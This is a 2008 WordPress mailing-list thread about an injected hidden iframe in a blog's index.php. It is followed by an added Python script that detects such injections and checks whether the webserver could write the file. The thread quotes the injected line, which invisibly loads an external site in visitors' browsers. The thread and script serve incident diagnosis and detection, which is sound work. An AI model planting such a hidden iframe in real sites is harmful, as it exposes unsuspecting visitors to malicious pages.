[wp-hackers] XSS vuln in wordpress 2.7 ?

madalin niladam at gmail.com
Mon Dec 22 17:59:37 GMT 2008


Me and only one friend have access to the server.

On Mon, Dec 22, 2008 at 7:33 PM, Joost de Valk <joost at yoast.com> wrote:
> If the file is writable for the webserver and file access is enabled on the
> webserver: yes.
>
> Joost de Valk
>
> joost at yoast.com
>
> http://yoast.com/
> http://twitter.com/jdevalk
>
> Sent from my iPhone
>
> On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:
>
>> Wow. That's nasty, and malicious. Could a plugin do that?
>>
>> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>>
>>> Hello,
>>>
>>> For some reason I found my blog's index.php (not theme's index.php)
>>> with the following piece of code right before the ?>
>>>
>>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
>>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>>
>>> I tried looking at the logs. No luck. The file's permissions look like
>>> this:
>>>
>>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50 /home/madalin/www/index.php
>>>
>>> I'm still trying to figure out how that line got there. I've
>>> downloaded wordpress right from wordpress.org, and the server is a
>>> dedicated one, only two users with shell access to it.
>>>
>>> Any suggestions ?
>>>
>>> --
>>> Regards,
>>> madalin
>>> http://madalin.eu
>>> http://www.tg-jiu.ro
>>> http://www.radioomega.ro
>>> _______________________________________________
>>> wp-hackers mailing list
>>> wp-hackers at lists.automattic.com
>>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>>
>
>
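The two questions in the thread are whether index.php carries an injected hidden iframe and whether the webserver identity could have written it. The following is an added example, not code from the thread or from WordPress: it scans PHP source for an echoed 1x1/hidden iframe modelled on the reported line and checks the file's mode bits against a hypothetical webserver uid/gid. The sample index.php and its placeholder URL are constructed.

```python
import os, re, stat, tempfile

# Pattern modelled on the line reported in the thread: an echoed iframe that
# points at an external site and is 1x1 or hidden via CSS.
HIDDEN_IFRAME = re.compile(
    r'echo\s+"<iframe[^"]*src=\\"(?P<src>https?://[^\\"]+)\\"'
    r'[^;]*(?:width=1\b|height=1\b|visibility:hidden)',
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample of a tampered index.php; the URL is a placeholder.
SAMPLE_INDEX_PHP = r'''<?php
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
echo "<iframe src=\"http://example.com/?click=0000\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>'''

def find_injected_iframes(php_source: str) -> list[str]:
    """Return the src URLs of hidden iframes echoed from PHP source."""
    return [m.group("src") for m in HIDDEN_IFRAME.finditer(php_source)]

def writable_by(path: str, uid: int, gids: set[int]) -> bool:
    """Mode-bit check only: could this uid/gids write the file? (root and POSIX ACLs ignored)"""
    st = os.stat(path)
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def audit_file(path: str, web_uid: int, web_gids: set[int]) -> dict:
    """Report injected iframes and whether the webserver identity can write the file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    return {"injected": find_injected_iframes(src),
            "webserver_can_write": writable_by(path, web_uid, web_gids)}

def demo() -> dict:
    """Audit the sample at the thread's mode (0644) and at world-write (0666),
    using a hypothetical webserver uid/gid that does not own the file."""
    with tempfile.NamedTemporaryFile("w", suffix=".php", delete=False) as fh:
        fh.write(SAMPLE_INDEX_PHP)
        path = fh.name
    web_uid, web_gids = os.getuid() + 1, {os.getgid() + 1}
    os.chmod(path, 0o644)
    strict = audit_file(path, web_uid, web_gids)
    os.chmod(path, 0o666)
    loose = audit_file(path, web_uid, web_gids)
    os.unlink(path)
    return {"mode_0644": strict, "mode_0666": loose}
```

With the reported -rw-r--r-- mode and a webserver user other than the owner, the mode bits alone rule out a direct write by the webserver, which leaves the owner's credentials, a process running as the owner (PHP as the owner, FTP, cron) or root as the remaining paths.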

